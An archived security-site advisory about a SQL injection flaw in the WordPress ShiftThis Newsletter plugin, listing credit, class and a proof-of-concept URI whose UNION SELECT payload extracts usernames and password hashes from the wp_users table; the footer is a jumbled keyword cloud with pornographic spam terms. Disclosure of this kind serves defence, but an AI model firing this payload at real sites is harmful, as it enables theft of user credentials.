about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , WordPress Plugin ShiftThis Newsletter SQL Injection Vulnerability


Title WordPress Plugin ShiftThis Newsletter SQL Injection Vulnerability
Published 2008-02-03-12:00AM
Updated 2008-02-04-09:27PM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  S@BUN discovered this vulnerability.
Vulnerable  ShiftThis ShiftThis Newsletter 0
Not Vulnerable  
Code  An attacker can exploit this issue via a browser.The following proof-of-concept URI is available:http://www.example.com/wp-content/plugins/st_newsletter/shiftthis-preview.php?newsletter=-1/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Sat, 12 Dec 2009 07:07:46 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
%20boo CMS is Fre Download K 200 /compo www world mambo Remo news for c 200 /compo Double fuc CMS is Fre DotProject www.dgycpa www.xxxsex News Searc 200 /compo CMS is Fre linux kern ARB Sex in bol mambo Remo Dooland CMS is Fre phpbb+ Free fuck. Donlot mas http://www antivir linux kern news for c Dokhtaraye sex moove 200 /compo www.gl126. CMS is Fre red hat re Dokhtar fa video o in Bollwood s Http.www.a Shopadmin www.027mas women Sexe malayalam Dogsax wwww 89com MORE SEX V weblogic Dogfuck 200 /compo weptrick